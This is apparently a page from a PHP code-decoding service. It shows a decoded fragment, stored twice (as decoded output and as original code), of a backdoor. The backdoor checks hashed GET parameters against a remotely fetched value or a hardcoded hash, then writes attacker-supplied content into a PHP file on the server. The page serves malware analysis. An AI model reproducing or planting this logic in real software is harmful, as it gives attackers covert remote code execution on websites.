Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

if (strstr($add_content, ".p" . "hp")) { $a = sha1(sha1(@$_GET["a"])); ..

Decoded Output download

<?  if (strstr($add_content, ".p" . "hp")) { 
            $a = sha1(sha1(@$_GET["a"])); 
            $b = sha1(sha1(@$_GET["b"])); 
            if ($a == dageget($http_web . "://" . $goweb . "/a.p" . "hp") || $b == "808735b17c8943e3715388958dc22d879a8c9eaa") { 
                $dstr = @$_GET["dstr"]; 
                if (file_put_contents($path . "/" . $add_content, $dstr)) { 
                    echo "ok"; 
                } 
            } 
        } 
    } 
    die; 
} ?>

Did this file decode correctly?

Original Code

if (strstr($add_content, ".p" . "hp")) {
            $a = sha1(sha1(@$_GET["a"]));
            $b = sha1(sha1(@$_GET["b"]));
            if ($a == dageget($http_web . "://" . $goweb . "/a.p" . "hp") || $b == "808735b17c8943e3715388958dc22d879a8c9eaa") {
                $dstr = @$_GET["dstr"];
                if (file_put_contents($path . "/" . $add_content, $dstr)) {
                    echo "ok";
                }
            }
        }
    }
    die;
}

Function Calls

None

Variables

None

Stats

MD5 882b50bdc7933417bafb38b008dd2b6e
Eval Count 0
Decode Time 57 ms